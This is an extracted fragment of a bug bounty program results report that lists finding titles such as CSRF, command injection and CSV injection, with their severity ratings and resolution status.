[Requested] Denial of Service Application- - P3 RESOLVED 

CSRF on Change Password form Cross-Site - P3 UNRESOLVED 

Command Injection Insecure - P3 UNRESOLVED 

Authentication Bypass on Lock Broken - P4 UNRESOLVED 

Telnet enabled on a Zombie Network - P4 UNRESOLVED 

CSV Injection in RCPD Reports External - P5 RESOLVED 

Bugcrowd Ongoing Program Results | Umbrella - All Details 9 of 41

Such details may include the following:

Bugcrowd Ongoing Program Results | Umbrella - All Details 10 of 41

any variable names.